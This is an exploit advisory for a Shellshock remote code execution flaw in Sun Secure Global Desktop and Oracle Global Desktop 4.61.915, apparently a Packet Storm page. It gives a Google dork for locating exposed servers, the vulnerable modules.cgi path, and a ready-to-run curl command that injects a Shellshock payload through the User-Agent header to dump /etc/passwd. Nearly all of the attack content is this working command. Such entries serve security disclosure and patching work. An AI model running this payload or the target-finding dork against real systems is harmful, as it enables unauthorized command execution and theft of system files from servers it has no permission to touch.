Sun Secure Global Desktop and Oracle Global Desktop version 4.61.915 remote shellshock code execution exploit.
35ec240c60b7255eaaf64467d8712fa76be5b375b7a5237d5221f43ac829bf35# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed